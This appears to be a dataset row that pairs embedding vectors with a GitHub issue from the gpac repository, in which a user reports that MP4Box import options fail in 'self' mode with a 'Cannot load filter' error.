0.00735499057918787, 0.02674107253551483, 0.02871834859251976, -0.014223635196685791, 0.008180185221135616, -0.010085705667734146, 0.012230413034558296, 0.002415785565972328, -0.018449267372488976, 0.0012547335354611278, -0.001984252827242017, -0.002541358582675457, -0.006394257303327322, 0.01763603277504444, -0.003219054313376546, -0.01961330883204937, -0.016535773873329163, -0.007155668456107378, -0.010643808171153069, 0.016009561717510223, 0.00853896513581276, 0.01851304993033409, 0.0038688448257744312, 0.01311540324240923, 0.008180185221135616, 0.0062387860380113125, 0.029037265107035637, -0.03996012359857559, 0.00002539801425882615, 0.026757018640637398, -0.019453851506114006, -0.009846518747508526, -0.01398444827646017, 0.014446876011788845, 0.011951361782848835, 0.020426543429493904, -0.012286222539842129, 0.02049032598733902, 0.001190950395539403, -0.008626666851341724, 0.01886385679244995, 0.014040258713066578, 0.004556506406515837, 0.01703009195625782, -0.00003182926957379095, 0.01026908215135336, -0.01703009195625782, -0.009926247410476208, 0.007267288863658905 ]
266
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I can't use any import option in Self mode with mp4box. I've tried several options that are marked with an `S` in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts) Example from the docs: `MP4Box -add self:moovts=-1:noedit src.mp4` Gives me the following: `[Importer] Cannot load filter for input file "self"` Is this faulty behavior or am I doing something wrong?
[MP4Box] Import options are not working in Self mode
https://api.github.com/repos/gpac/gpac/issues/1700/comments
5
2021-03-05T11:52:42
2021-03-05T12:53:02Z
https://github.com/gpac/gpac/issues/1700
823,014,498
1,700
false
This is a GitHub Issue repo:gpac owner:gpac Title : [MP4Box] Import options are not working in Self mode Issue date: --- start body --- I can't use any import option in Self mode with mp4box. I've tried several options that are marked with an `S` in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts) Example from the docs: `MP4Box -add self:moovts=-1:noedit src.mp4` Gives me the following: `[Importer] Cannot load filter for input file "self"` Is this faulty behavior or am I doing something wrong? --- end body ---
557
[ -0.007442917674779892, 0.030988987535238266, -0.024060800671577454, 0.012631543911993504, -0.014059262350201607, -0.0019518403569236398, -0.016756897792220116, 0.04400376230478287, -0.02828383818268776, 0.016456324607133865, 0.025759031996130943, 0.04018649458885193, 0.002124669263139367, -0.029215611517429352, 0.012007856741547585, -0.0023707628715783358, -0.00009692277672002092, 0.029967043548822403, -0.04508582130074501, -0.017718728631734848, -0.014111862517893314, -0.029666470363736153, -0.02088976465165615, 0.05395270138978958, -0.02595440484583378, 0.01644129678606987, -0.04640834033489227, 0.03171036019921303, -0.010226966813206673, -0.03375425189733505, -0.002453420078381896, 0.00412535248324275, 0.016005465760827065, 0.03128955885767937, 0.038863979279994965, 0.018545301631093025, 0.02819366753101349, 0.04171941429376602, -0.04051712527871132, 0.02425617165863514, -0.04547656700015068, -0.03682008758187294, -0.027787894010543823, 0.030898816883563995, -0.03058321587741375, 0.01865050196647644, -0.04917360097169876, 0.0042192814871668816, -0.04406387731432915, 0.01148936990648508, 0.03666980192065239, -0.01704244129359722, 0.0038304163608700037, -0.038473233580589294, 0.021385708823800087, 0.0094605078920722, 0.019627360627055168, -0.028028352186083794, -0.03645940124988556, 0.025804119184613228, -0.015449408441781998, -0.005876185372471809, -0.013165059499442577, 0.005504227243363857, -0.017327984794974327, 0.01397660467773676, -0.016847068443894386, 0.007717189844697714, -0.013811290264129639, 0.02431628666818142, -0.023174112662672997, 0.01587020978331566, 0.0024440272245556116, 0.01212808582931757, 0.046648796647787094, -0.05350184068083763, 0.04403381794691086, -0.008122961968183517, -0.02792315185070038, 0.019627360627055168, -0.046678852289915085, 0.0062180859968066216, -0.013014773838222027, 0.0009956451831385493, -0.023264283314347267, -0.013225174508988857, 0.007063445169478655, -0.05671796202659607, -0.026720862835645676, -0.00988882314413786, 0.039134494960308075, -0.0035542657133191824, 0.04036683961749077, -0.020664334297180176, 0.01831987127661705, 0.029741613194346428, 0.016336096450686455, 0.006210572086274624, -0.03348373621702194, -0.0249775443226099, -0.021505936980247498, -0.042741358280181885, 0.006672701798379421, -0.024391429498791695, 0.008010247722268105, 0.0029719071462750435, 0.007536846678704023, -0.029140468686819077, 0.002665699226781726, 0.12876510620117188, -0.0011431134771555662, 0.018695587292313576, -0.01647135429084301, -0.006635129917412996, 0.008423534221947193, 0.012872002087533474, -0.02001810446381569, -0.01901118829846382, 0.001888908096589148, -0.022212281823158264, 0.008611392229795456, 0.0307335015386343, -0.01029459573328495, 0.008739135228097439, -0.04382341727614403, 0.017102554440498352, -0.039134494960308075, 0.01828981563448906, -0.011624627746641636, -0.03585825860500336, -0.012361029163002968, 0.0038191447965800762, 0.0028479211032390594, -0.001257706549949944, -0.039284780621528625, 0.013766204006969929, -0.025608746334910393, 0.017282897606492043, -0.06239877641201019, -0.010813082568347454, -0.0835590586066246, -0.029861843213438988, 0.0018316115019842982, 0.01454769168049097, -0.035647857934236526, -0.015584665350615978, 0.030147386714816093, 0.0067253015004098415, -0.025353260338306427, 0.003193578915670514, -0.00474528269842267, -0.006552472710609436, 0.01253385841846466, -0.00829579122364521, 0.06744839251041412, 0.019747590646147728, 0.022512853145599365, -0.02840406820178032, 0.002795320935547352, 0.0039788237772881985, -0.01877073012292385, -0.026360176503658295, -0.02273828350007534, 0.015389293432235718, -0.008926992304623127, -0.027171721681952477, -0.010993425734341145, 0.01992793381214142, -0.006221843417733908, 0.014021690934896469, -0.01880078762769699, 0.014908378012478352, 0.034806255251169205, 0.004613782279193401, 0.02613474801182747, -0.023760227486491203, 0.008633934892714024, 0.03706054389476776, -0.009648365899920464, -0.011895142495632172, -0.006537443958222866, 0.018966102972626686, -0.005143540911376476, -0.00993390940129757, 0.010181881487369537, -0.004512339364737272, 0.0005471352487802505, -0.02476714551448822, 0.06582529842853546, -0.01774878427386284, 0.009550679475069046, 0.005951328668743372, -0.006559987086802721, -0.019161473959684372, 0.02706652134656906, 0.03709060326218605, -0.02807343751192093, -0.014713006094098091, -0.007225003093481064, 0.012233286164700985, 0.03222133219242096, -0.03549756854772568, 0.002906156936660409, 0.007589446846395731, -0.011789942160248756, -0.011091112159192562, -0.04054718092083931, 0.03811254724860191, 0.0018851509084925056, -0.03796226158738136, 0.010196910239756107, -0.054583899676799774, 0.042711302638053894, -0.011496884748339653, -0.028449153527617455, -0.004981983453035355, -0.019401932135224342, -0.006018957123160362, -0.043282389640808105, -0.010106738656759262, 0.007469217758625746, -0.024361371994018555, 0.013826319016516209, -0.02592434734106064, -0.030237557366490364, 0.014743063598871231, -0.017027411609888077, -0.0025755276437848806, 0.023324398323893547, 0.025939375162124634, 0.03742123022675514, 0.027081551030278206, 0.011895142495632172, -0.0004992315662093461, -0.012601487338542938, 0.01150439865887165, 0.005598156247287989, -0.005913756787776947, 0.03549756854772568, -0.012315943837165833, -0.0018663652008399367, 0.03423516824841499, -0.020634276792407036, -0.01433729100972414, 0.0008458287920802832, 0.05196892470121384, 0.02386542782187462, 0.02598446235060692, -0.01834992878139019, -0.03219127655029297, 0.0030620787292718887, 0.027141664177179337, -0.038924094289541245, -0.009355307556688786, -0.01538177952170372, 0.023760227486491203, 0.019026216119527817, -0.0034716082736849785, -0.0056094275787472725, -0.04445461928844452, -0.001995047554373741, 0.008701563812792301, 0.002900521270930767, -0.020874734967947006, 0.012849459424614906, -0.03363402187824249, -0.012263343669474125, -0.021460851654410362, 0.012691658921539783, 0.008243191055953503, 0.0018701222725212574, -0.012924602255225182, -0.05593647435307503, 0.022092051804065704, -0.020934849977493286, -0.029876871034502983, 0.030928874388337135, 0.01662163995206356, 0.020844677463173866, -0.043252330273389816, -0.02897515520453453, 0.010850653983652592, -0.0038736234419047832, 0.035016655921936035, -0.01605055294930935, 0.0004973529721610248, 0.002534198807552457, 0.001946204574778676, -0.03309299424290657, 0.02631509117782116, 0.01847015880048275, 0.05022560432553291, -0.015614722855389118, 0.029516184702515602, 0.029426012188196182, 0.0013807532377541065, -0.0006645462126471102, 0.015599694103002548, 0.012421144172549248, 0.014585263095796108, -0.027201779186725616, 0.013480660505592823, 0.03429528325796127, 0.007589446846395731, -0.025774061679840088, 0.016486382111907005, 0.02037879079580307, 0.03549756854772568, -0.0023407055996358395, -0.020303647965192795, 0.02607463300228119, -0.03372419625520706, -0.018695587292313576, 0.019612332805991173, -0.028960125520825386, 0.0024628129322081804, 0.031319618225097656, -0.034445568919181824, -0.018575359135866165, 0.01238357275724411, 0.002453420078381896, -0.026811035349965096, -0.039435066282749176, -0.011955256573855877, 0.009685937315225601, -0.01421706285327673, -0.027231836691498756, 0.021566051989793777, -0.030838701874017715, 0.005868670996278524, -0.005887456703931093, 0.017508327960968018, 0.046438395977020264, -0.006097857374697924, -0.00666143000125885, -0.019431989639997482, 0.003270600689575076, -0.030087271705269814, -0.03140978887677193, -0.0016775683034211397, -0.0010642132256180048, 0.04550662264227867, 0.019973019137978554, -0.0189210157841444, 0.015043635852634907, -0.007472974713891745, 0.0166516974568367, 0.017493298277258873, 0.042530957609415054, -0.00828076247125864, 0.0009975237771868706, 0.002515413099899888, 0.004099052399396896, -0.01009922381490469, 0.006503629963845015, -0.024932458996772766, -0.030988987535238266, -0.05410298705101013, -0.03354385122656822, 0.029546242207288742, 0.0017949793254956603, -0.046979427337646484, 0.022332509979605675, 0.012270857580006123, -0.002218598034232855, 0.038683634251356125, -0.023083940148353577, -0.006135428790003061, -0.0251278318464756, -0.017718728631734848, -0.008799249306321144, 0.021686280146241188, -0.021911708638072014, 0.0039713094010949135, -0.01497600693255663, 0.0034284009598195553, 0.013721118681132793, 0.0181695856153965, -0.012872002087533474, 0.00031325253075920045, -0.0636010691523552, 0.00890444964170456, -0.014818206429481506, -0.03703048825263977, -0.0015714287292212248, -0.007566903717815876, -0.015524551272392273, 0.005496712867170572, -0.0169522687792778, -0.0378420315682888, -0.039134494960308075, -0.014074290171265602, -0.021175308153033257, -0.03817266225814819, -0.04490547999739647, 0.027817951515316963, -0.028328925371170044, -0.05272035300731659, -0.0068868594244122505, 0.0457170233130455, 0.03309299424290657, -0.024722058326005936, 0.04235061630606651, 0.02043890580534935, -0.011008454486727715, 0.03309299424290657, 0.0038773806300014257, 0.010617710649967194, -0.012052942998707294, 0.01980770379304886, 0.012684144079685211, 0.0140066621825099, 0.005199898034334183, -0.00008723636710783467, 0.04198992997407913, 0.028900012373924255, 0.006868073716759682, 0.039104435592889786, -0.010302110575139523, 0.023534798994660378, 0.034655969589948654, -0.019702503457665443, 0.0076307752169668674, -0.010437367483973503, 0.030958930030465126, -0.013488175347447395, -0.014675434678792953, 0.03739117458462715, 0.024361371994018555, -0.019837761297822, 0.02395560033619404, -0.04400376230478287, -0.03264213353395462, -0.030327729880809784, 0.022422682493925095, -0.01436734851449728, -0.03025258705019951, -0.021460851654410362, -0.008453591726720333, 0.025969432666897774, -0.03222133219242096, 0.025593718513846397, 0.015629751607775688, -0.0031973361037671566, 0.03252190724015236, -0.026630692183971405, -0.034144993871450424, -0.04132866859436035, 0.015239007771015167, -0.025533603504300117, 0.011729828082025051, 0.0033908295445144176, 0.021415764465928078, 0.014419948682188988, 0.019612332805991173, 0.0006697123171761632, -0.008746649138629436, 0.00415540998801589, 0.034986596554517746, -0.008799249306321144, 0.019732560962438583, 0.011797457002103329, 0.01898113079369068, -0.02643531933426857, 0.009655879810452461, 0.016726840287446976, -0.03615882992744446, -0.024541715160012245, 0.009693451225757599, -0.04430433362722397, 0.01212808582931757, -0.009828709065914154, 0.051427893340587616, 0.043703190982341766, 0.001252070884220302, 0.03555768355727196, -0.012541372328996658, 0.005060883238911629, 0.018755702301859856, -0.04403381794691086, -0.02795320935547352, -0.030838701874017715, -0.009272650815546513, -0.01680198311805725, -0.034475624561309814, -0.030628301203250885, -0.014089318923652172, -0.007814875803887844, -0.013999147340655327, 0.02276833914220333, 0.017793871462345123, 0.0039036807138472795, -0.034475624561309814, 0.006052771583199501, 0.015043635852634907, 0.030297672376036644, 0.015329179354012012, -0.015494493767619133, 0.017493298277258873, 0.0109032541513443, 0.004538639448583126, 0.004812911618500948, -0.015795066952705383, -0.017117584124207497, 0.04502570629119873, -0.023594914004206657, -0.013067374005913734, 0.017673641443252563, -0.0047264969907701015, -0.022603025659918785, -0.005538041703402996, -0.012751772999763489, -0.02004816196858883, -0.021551022306084633, -0.006274443585425615, -0.03183059021830559, 0.00887439213693142, -0.017102554440498352, 0.04153906926512718, 0.008603877387940884, -0.027291949838399887, -0.01127896923571825, -0.0066238585859537125, 0.009205021895468235, 0.007784818299114704, 0.009024678729474545, -0.00557937053963542, -0.00526752695441246, -0.0028911284171044827, 0.010790539905428886, -0.04220033064484596, -0.01300725992769003, -0.009971480816602707, 0.029786698520183563, 0.0157499797642231, -0.004771582782268524, -0.01992793381214142, -0.009498079307377338, -0.015494493767619133, 0.006402186583727598, -0.027502350509166718, 0.026931263506412506, -0.016606610268354416, 0.010039109736680984, -0.02715669386088848, 0.005323884077370167, 0.008288277313113213, 0.03567791357636452, -0.024571772664785385, 0.007427888922393322, -0.02398565784096718, -0.013713603839278221, -0.005970114376395941, 0.029456069692969322, 0.002836649538949132, 0.00929519347846508, -0.007435403298586607, 0.024992574006319046, -0.012067971751093864, 0.014968493022024632, -0.007288874592632055, 0.0222573671489954, 0.00912987906485796, 0.015479465015232563, -0.003041414311155677, 0.010422338731586933, 0.0067403302527964115, -0.0037064303178340197, -0.0369403176009655, -0.017643583938479424, 0.002385791391134262, 0.025368288159370422, 0.019371874630451202, 0.0034359153360128403, -0.004050209652632475, 0.013811290264129639, 0.010737939737737179, 0.005868670996278524, 0.021160278469324112, -0.01517137885093689, 0.024872343987226486, -0.01859038695693016, -0.029426012188196182, 0.007326446007937193, -0.003740244545042515, 0.029831785708665848, -0.007995218969881535, -0.013119974173605442, -0.014885835349559784, 0.00789001863449812, 0.020303647965192795, 0.012413629330694675, 0.0077622756361961365, -0.02213713899254799, 0.03624900057911873, -0.017658613622188568, -0.009610794484615326, 0.009182479232549667, 0.034475624561309814, 0.017508327960968018, 0.0008819914073683321, 0.019431989639997482, -0.004989497363567352, -0.000059879606851609424, -0.012887030839920044, 0.008859364315867424, 0.0015620358753949404, -0.017373070120811462, -0.02207702398300171, 0.03769174590706825, -0.013856375589966774, 0.0246769730001688, 0.029050298035144806, -0.04153906926512718, 0.01668175309896469, 0.03315310925245285, 0.007412860635668039, 0.02025856263935566, 0.007987705059349537, 0.03022252954542637, 0.024301256984472275, -0.046648796647787094, 0.058972254395484924, -0.016275981441140175, -0.01250380091369152, 0.021205365657806396, -0.005075911991298199, -0.0073640174232423306, 0.0021490908693522215, -0.012203228659927845, -0.030688416212797165, 0.028869954869151115, -0.00009222633525496349, -0.028990183025598526, -0.019537189975380898, 0.01535172201693058, -0.0049782260321080685, -0.005902485456317663, -0.024241143837571144, -0.03760157525539398, 0.011391684412956238, 0.007536846678704023, -0.0014728035312145948, 0.031169330701231956, -0.0077472468838095665, 0.020213477313518524, -0.007420375011861324, -0.006176757626235485, 0.01456272043287754, 0.01197780016809702, -0.017493298277258873, 0.0037045516073703766, 0.004290667362511158, 0.005684570875018835, 0.009054736234247684, -0.02443651482462883, 0.008603877387940884, 0.03213116154074669, 0.0003268721920903772, -0.002994450042024255, -0.004264367278665304, -0.02431628666818142, 0.010565110482275486, -0.0049932547844946384, -0.006668944377452135, 0.01834992878139019, 0.0028404067270457745, -0.0047264969907701015, -0.034415509551763535, 0.011316541582345963, 0.01153445616364479, -0.008656477555632591, 0.017327984794974327, -0.012849459424614906, -0.006965759210288525, -0.006082828622311354, 0.007600718177855015, 0.006526172626763582, 0.0062406291253864765, -0.022963711991906166, 0.009911366738379002, -0.0222573671489954, -0.015291607938706875, 0.006969516631215811, -0.03739117458462715, 0.00564699899405241, -0.011752370744943619, 0.012984716333448887, -0.003727094503119588, 0.00026981046539731324, 0.007668346632272005, 0.006913159508258104, -0.007292631547898054, 0.028358981013298035, -0.03049304336309433, -0.022512853145599365, 0.020604221150279045, -0.009550679475069046, 0.014810692518949509, 0.012902059592306614, -0.04192981496453285, 0.007927590049803257, 0.005507984664291143, -0.03198087587952614, 0.0006434122333303094, -0.0061241574585437775, 0.007330202963203192, -0.0006711212336085737, 0.012270857580006123, -0.002953121205791831, 0.0018654258456081152, 0.00698830233886838, 0.005665784701704979, 0.04433439299464226, 0.002802835311740637, 0.01229340024292469, -0.0005311673157848418, -0.02658560685813427, -0.021085135638713837, 0.01571992225944996, -0.01047493889927864, -0.021941766142845154, -0.039014264941215515, -0.0003836991381831467, 0.03225139155983925, 0.029020240530371666, 0.006714030168950558, -0.002727692248299718, 0.03067338652908802, -0.0018898473354056478, -0.009452993981540203, -0.006635129917412996, 0.021551022306084633, 0.011196312494575977, -0.015524551272392273, -0.00994893815368414, 0.0020852191373705864, -0.006180514581501484, 0.012263343669474125, 0.0016653575003147125, 0.0027539923321455717, 0.00564699899405241, -0.03159013390541077, -0.01831987127661705, 0.01357834693044424, -0.02694629319012165, 0.024090858176350594, 0.016245923936367035, -0.05746939405798912, 0.0062331147491931915, 0.03612877056002617, 0.030072243884205818, 0.007965161465108395, -0.019326789304614067, -0.017673641443252563, 0.0068868594244122505, 0.010655282065272331, -0.027622580528259277, 0.007300145924091339, -0.017297927290201187, 0.009828709065914154, -0.012819401919841766, -0.01399163343012333, 0.0011299634352326393, -0.001863547251559794, 0.0028347710613161325, 0.0014483820414170623, -0.022663138806819916, 0.006157971918582916, -0.005357698537409306, -0.012654087506234646, 0.022873539477586746, -0.01641123928129673, -0.023775257170200348, -0.010039109736680984, 0.0066163442097604275, -0.02933584153652191, -0.00729638896882534, -0.0023068911395967007, -0.03666980192065239, -0.029486127197742462, -0.0009618308395147324, -0.025218002498149872, 0.042380671948194504, 0.0036895230878144503, -0.014096833765506744, -0.001182563486509025, -0.01215814333409071, -0.0010125524131581187, -0.00020605629833880812, 0.02834395319223404, -0.03010229952633381, 0.02446657232940197, -0.030988987535238266, -0.034205108880996704, -0.01217317208647728, -0.001208863570354879, 0.007307660300284624, -0.002201691037043929, 0.02183656580746174, -0.012676630169153214, 0.007285117171704769, -0.02198685146868229, -0.04099804162979126, 0.007288874592632055, -0.013668518513441086, -0.008679020218551159, 0.010640254244208336, -0.03621894493699074, 0.009220050647854805, -0.015306636691093445, 0.010640254244208336, 0.010444882325828075, 0.0012821280397474766, -0.008633934892714024, -0.00504209753125906, 0.014833235181868076, -0.006345829460769892, -0.022512853145599365, 0.05734916403889656, -0.007179917301982641, 0.001713261241093278, -0.009445480071008205, 0.010257024317979813, 0.004343267530202866, -0.02473708800971508, -0.00890444964170456, 0.017162669450044632, 0.014314748346805573, -0.01904124580323696, -0.014096833765506744, 0.0008852789178490639, -0.02682606317102909, 0.02282845415174961, -0.014780635014176369, 0.024962516501545906, 0.027577493339776993, -0.01641123928129673, -0.007078473921865225, 0.021055078133940697, -0.04556673765182495, 0.0041028098203241825, -0.0258942898362875, -0.0299820713698864, 0.017327984794974327, -0.03378430753946304, 0.005038340575993061, 0.013074887916445732, 0.020153362303972244, 0.0079501336440444, 0.02470703050494194, -0.007112288381904364, 0.007499274797737598, 0.025683889165520668, -0.016396209597587585, -0.010039109736680984, -0.01608061045408249, -0.01777884177863598, 0.020213477313518524, -0.012729230336844921, -0.00546665582805872, 0.021340621635317802, -0.013811290264129639, 0.0019368117209523916, -0.016125695779919624, -0.019762618467211723, 0.01293211616575718, -0.028238752856850624, -0.0037364873569458723, 0.003011357272043824, -0.03675997257232666, -0.04430433362722397, -0.015284093096852303, -0.0026844849344342947, -0.02022850513458252, 0.022693196311593056, 0.004020152613520622, -0.02673589251935482, -0.003727094503119588, -0.01130902674049139, 0.007153617218136787, 0.03153001889586449, -0.0050721550360322, 0.001363846124149859, 0.02933584153652191, -0.007668346632272005, 0.024150971323251724, -0.03246179223060608, -0.015178893692791462, 0.004508581943809986, -0.001252070884220302, -0.03201093152165413, -0.038863979279994965, 0.00384544488042593, 0.0012436172692105174, 0.016396209597587585, 0.005699599161744118, -0.04499565064907074, 0.01704244129359722, -0.055756133049726486, -0.009565708227455616, -0.015239007771015167, 0.014209548011422157, 0.0058799427933990955, 0.0012126207584515214, -0.022723253816366196, 0.017613528296351433, -0.001552643021568656, -0.023564856499433517, 0.027216807007789612, 0.012872002087533474, 0.020003076642751694, 0.011466827243566513, -0.007724704220890999, 0.009708479978144169, -0.013676032423973083, -0.034144993871450424, 0.03703048825263977, 0.017312955111265182, 0.042681243270635605, -0.02822372503578663, -0.01356331817805767, -0.012864488177001476, 0.0283138956874609, 0.0005753138684667647, -0.025503545999526978, -0.006672701798379421, 0.020423877984285355, 0.031049102544784546, 0.007446674630045891, -0.006296986248344183, -0.009708479978144169, -0.008288277313113213, 0.014434977434575558, 0.017373070120811462, -0.007995218969881535, -0.002102126367390156, 0.008724106475710869, -0.01318760309368372, -0.013428060337901115, 0.008243191055953503, 0.0010435489239171147, -0.022542910650372505, -0.047340113669633865, -0.031229445710778236, 0.0239255428314209, -0.005808556452393532, 0.010955854319036007, -0.015088721178472042, -0.03787209093570709, -0.023504741489887238, 0.003967552445828915, -0.03318316489458084, -0.015659809112548828, 0.0034659726079553366, 0.00698830233886838, -0.025082744657993317, 0.005504227243363857, -0.004384596366435289, 0.001322517404332757, 0.0014728035312145948, -0.0038848950061947107, -0.014089318923652172, -0.005278798285871744, -0.011699770577251911, 0.031319618225097656, -0.027998294681310654, 0.02413594350218773, -0.008573820814490318, -0.02712663635611534, 0.0017996757524088025, -0.025668861344456673, -0.0047189826145768166, 0.05287063866853714, 0.006293229293078184, 0.004038938321173191, 0.00232379836961627, -0.01596038043498993, -0.0017480148235335946, -0.010407310910522938, -0.025187944993376732, -0.05846128240227699, 0.0009284861152991652, -0.012699172832071781, -0.0031128001864999533, 0.008671506308019161, 0.005816070828586817, 0.024992574006319046, -0.02091982029378414, -0.01318760309368372, 0.03669985756278038, 0.0035880799405276775, 0.031109217554330826, -0.03660968691110611, 0.029245669022202492, -0.02864452451467514, 0.013405517674982548, 0.004294424317777157, -0.01515635009855032, 0.0034096152521669865, -0.011872599832713604, 0.01533669326454401, -0.0024365128483623266, -0.012052942998707294, -0.0037195803597569466, -0.0018391257617622614, 0.017673641443252563, 0.0004440483753569424, -0.022452739998698235, 0.000986252329312265, -0.00082046800525859, 0.0202886201441288, -0.0327022485435009, 0.013074887916445732, -0.029771670699119568, 0.02837401069700718, -0.007724704220890999, -0.016636667773127556, 0.023700114339590073, 0.03748134523630142, -0.004561182111501694, -0.019627360627055168, -0.002350098453462124, 0.008543763309717178, 0.0025736489333212376, 0.029696527868509293, -0.020243532955646515, -0.0009458629647269845, 0.015689866617321968, 0.00759320380166173, 0.00789001863449812, -0.01456272043287754, -0.010512510314583778, 0.010429853573441505, -0.008348391391336918, -0.020303647965192795, -0.004651353694498539, -0.034505683928728104, -0.025323202833533287, -0.013841346837580204, 0.04108821228146553, -0.0017818292835727334, -0.02100999280810356, -0.03192076086997986, -0.01418700534850359, 0.025548631325364113, 0.019296731799840927, 0.021205365657806396, -0.00595884257927537, 0.008137990720570087, 0.021626165136694908, -0.013871404342353344, 0.042861588299274445, -0.043162159621715546, -0.021400736644864082, -0.02628503367304802, 0.010655282065272331, -0.00952062290161848, 0.029140468686819077, -0.009558194316923618, 0.002714542206376791, -0.022903596982359886, 0.015231492929160595, -0.015389293432235718, -0.0006819230620749295, -0.008663992397487164, -0.0019706261809915304, 0.0246769730001688, -0.007022116798907518, 0.01338297501206398, 0.02506771683692932, 0.02625497616827488, -0.015855180099606514, -0.02446657232940197, 0.007142345421016216, -0.002515413099899888, 0.011541970074176788, -0.023444626480340958, 0.003941252361983061, -0.002954999916255474, 0.02506771683692932, -0.018545301631093025, 0.0012154385913163424, 0.0066088298335671425, -0.04427427798509598, 0.024661945179104805, 0.0019236616790294647, -0.016336096450686455, -0.005737170577049255, -0.017072496935725212, -0.021025020629167557, -0.0012323458213359118, 0.023850400000810623, -0.021190335974097252, -0.015208950266242027, -0.007694646716117859, 0.017282897606492043, 0.07856956124305725, 0.014968493022024632, -0.007566903717815876, -0.016306038945913315, -0.000353172275936231, -0.006710273213684559, 0.03252190724015236, 0.017628556117415428, 0.019822733476758003, -0.021746395155787468, 0.04436444863677025, 0.0013920246856287122, -0.025142859667539597, -0.013044831342995167, 0.01841004379093647, 0.017553413286805153, -0.0019105116371065378, 0.010497482493519783, -0.004001366440206766, -0.013600889593362808, -0.02918555587530136, 0.009761080145835876, 0.010174366645514965, -0.0019762618467211723, -0.011481855995953083, 0.0024383915588259697, -0.00826573371887207, 0.012654087506234646, 0.022783368825912476, 0.017974214628338814, -0.02073947712779045, 0.016456324607133865, -0.009152421727776527, 0.00557937053963542, 0.008663992397487164, -0.00009111093095270917, -0.012045429088175297, -0.0017245326889678836, 0.007799847051501274, -0.019537189975380898, 0.015629751607775688, -0.014277176931500435, 0.005883699748665094, -0.0006645462126471102, -0.00707095954567194, -0.0017245326889678836, 0.034205108880996704, 0.004794125910848379, -0.008040305227041245, -0.010970883071422577, -0.01686209812760353, -0.029546242207288742, 0.0036068656481802464, 0.03402476757764816, -0.008145504631102085, -0.010805568657815456, 0.0008942021522670984, -0.018064385280013084, -0.03279241919517517, -0.029110413044691086, 0.003219878999516368, 0.011384169571101665, 0.011203826405107975, -0.0068643162958323956, 0.0304329302161932, -0.02091982029378414, -0.008926992304623127, 0.00890444964170456, 0.004899325780570507, 0.029906928539276123, 0.013886433094739914, -0.022242339327931404, -0.0031278289388865232, -0.0002079348632832989, 0.04791120067238808, 0.03354385122656822, 0.006962002255022526, -0.0032461790833622217, -0.013210145756602287, -0.019101358950138092, 0.013345403596758842, 0.00044240462011657655, 0.012894544750452042, 0.002393305767327547, 0.0033081721048802137, 0.012270857580006123, 0.010617710649967194, 0.0008768253028392792, -0.01314251683652401, -0.007435403298586607, -0.00103509530890733, 0.014510120265185833, 0.017132611945271492, 0.029786698520183563, -0.005786013789474964, -0.027878066524863243, 0.00017059817037079483, -0.01127896923571825, -0.021370679140090942, -0.003548629814758897, -0.0063796439208090305, 0.004621296655386686, 0.011865084990859032, 0.023715142160654068, -0.013969090767204762, 0.008633934892714024, 0.010835626162588596, 0.005816070828586817, 0.01317257434129715, 0.03703048825263977, -0.011391684412956238, -0.013638461008667946, -0.004673896823078394, -0.019597303122282028, -0.01998804695904255, 0.019431989639997482, -0.021551022306084633, 0.02107010781764984, 0.03802237659692764, -0.002893006894737482, -0.019462047144770622, -0.010970883071422577, 0.00046236449270509183, 0.006007685791701078, 0.024571772664785385, 0.01153445616364479, -0.023384513333439827, 0.01299223117530346, 0.04553667828440666, 0.035257112234830856, 0.033994708210229874, 0.024932458996772766, -0.0021622409112751484, -0.019522160291671753, 0.025383317843079567, -0.013458117842674255, -0.0020194691605865955, 0.017508327960968018, 0.0002177973947254941, -0.010752968490123749, -0.01980770379304886, 0.006360858213156462, 0.01197780016809702, 0.008806764148175716, 0.0003111391270067543, -0.01147434115409851, -0.002645034808665514, 0.010174366645514965, 0.005158569198101759, 0.03579814359545708, -0.004365810193121433, -0.019206559285521507, -0.0007730340003035963, 0.008686535060405731, 0.005857399664819241, 0.007882504723966122, -0.0002942319551948458, -0.04809154197573662, -0.0012126207584515214, 0.02085970714688301, 0.021686280146241188, 0.016786953434348106, 0.030207499861717224, -0.011895142495632172, -0.009257622063159943, 0.02052907831966877, -0.00808539055287838, -0.046558625996112823, -0.030838701874017715, 0.007533089257776737, -0.03790214657783508, 0.03333345055580139, -0.0032931435853242874, -0.025443432852625847, 0.0026487919967621565, 0.02249782532453537, -0.025608746334910393, 0.0020514049101620913, 0.002750235144048929, -0.003937494941055775, 0.006702758837491274, 0.012879515998065472, -0.014029204845428467, -0.0032236361876130104, 0.01847015880048275, -0.01998804695904255, 0.017478270456194878, -0.012248314917087555, -0.03195082023739815, 0.025248060002923012, 0.00792007613927126, 0.015795066952705383, -0.021205365657806396, -0.011940228752791882, -0.02034873329102993, -0.01626095362007618, -0.006950730923563242, 0.0006927248905412853, 0.00526752695441246, 0.023940570652484894, -0.021055078133940697, 0.029786698520183563, -0.0013103067176416516, 0.017673641443252563, 0.00425309594720602, -0.0029700284358114004, 0.02598446235060692, -0.005368969868868589, -0.015825122594833374, 0.0062819579616189, -0.012706687673926353, -0.009250108152627945, -0.005474170204252005, 0.001966868992894888, 0.013067374005913734, -0.021340621635317802, -0.011429255828261375, -0.0047302539460361, -0.022452739998698235, 0.03396465256810188, -0.017117584124207497, 0.006285714916884899, 0.007536846678704023, 0.008911964483559132, -0.015554608777165413, 0.011639656499028206, 0.04625805467367172, -0.012473744340240955, 0.003462215419858694, 0.030628301203250885, -0.0006354282959364355, -0.015269065275788307, 0.022422682493925095, 0.008911964483559132, 0.005707113537937403, 0.008844335563480854, 0.012195714749395847, 0.003899923525750637, 0.025413375347852707, -0.03231150656938553, -0.00025759972049854696, -0.017162669450044632, -0.00832584872841835, -0.010798053815960884, -0.005293827038258314, -0.00016167493595276028, 0.017673641443252563, 0.013510718010365963, 0.014540177769958973, 0.013706089928746223, -0.010767997242510319, -0.022272394970059395, -0.001832550740800798, -0.009663394652307034, 0.005444113165140152, 0.028328925371170044, 0.01412689033895731, -0.020874734967947006, 0.028629496693611145, -0.00414038123562932, 0.004835454281419516, -0.02888498269021511, -0.012849459424614906, 0.009152421727776527, -0.02595440484583378, 0.02652549184858799, -0.021911708638072014, 0.0015648537082597613, 0.009685937315225601, -0.008724106475710869, -0.0025792845990508795, 0.005925028584897518, 0.01783895678818226, -0.0030245070811361074, -0.03808249160647392, 0.0029982072301208973, 0.014870806597173214, -0.03201093152165413, -0.038653578609228134, 0.005797285120934248, -0.005019554868340492, 0.00888942088931799, 0.012075485661625862, -0.02207702398300171, -0.003764666151255369, 0.0062631722539663315, 